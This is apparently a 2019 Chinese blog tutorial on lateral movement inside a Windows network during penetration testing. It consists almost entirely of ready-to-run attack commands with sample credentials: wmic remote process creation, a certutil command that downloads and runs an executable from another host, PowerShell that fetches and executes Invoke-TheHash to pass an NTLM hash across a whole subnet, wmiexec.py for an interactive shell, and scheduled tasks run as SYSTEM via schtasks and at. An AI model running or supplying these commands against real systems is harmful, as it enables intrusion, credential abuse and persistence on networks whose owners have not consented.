内网渗透----横向移动

SMB WMI

使用wmic查询远程主机进程信息:

wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123  process list brief

在这里插入图片描述

创建进程:

wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123  process call create "calc.exe"

在这里插入图片描述

下载文件并执行

wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123  process call create "cmd /c  certutil.exe -urlcache -split -f http://10.60.18.18/test/putty.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"

在这里插入图片描述

使用powershell查看主机进程信息:

powershell -ep bypass
Get-WmiObject -Namespace "root\cimv2" -class Win32_process -Credential administrator -ComputerName 192.168.91.131

在这里插入图片描述

查看共享信息:

Get-WmiObject -Namespace "root\cimv2" -class Win32_share -Credential administrator -ComputerName 192.168.91.131

在这里插入图片描述

打开交互式shell:

python setup.py install
python wmiexec.py -share admin$ administrator:360College@192.168.111.51

在这里插入图片描述

使用HASH碰撞内网中其他机器:

powershell -ep bypass
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-TheHash.ps1');
Invoke-TheHash -Type WMIExec -Target 192.168.111.0/24 -Domain rootkit -Username administrator -Hash 7c70a81c7c5882c24298d391fd397885

在这里插入图片描述

计划任务

ipc

net use \\192.168.91.131\IPC$ /user:"administrator" "ABCabc123"
copy C:\Users\qianxiao996\Desktop\putty.exe \\192.168.91.131\c$

schtasks

schtasks /create /s 192.168.91.131 /u Administrator /p ABCabc123 /ru "SYSTEM" /tn CMDNAME /sc DAILY /st 22:18 /tr C:\\Users\\qianxiao996\\Desktop\\sha\\cmd.bat /F

at

at \\192.168.91.131 19:30 /every:5,6,7,10,18,19,21,24,28 c:\windows\temp\cmd.bat
posted @ 2019-05-31 20:04  浅笑996  阅读(316)  评论(0编辑  收藏  举报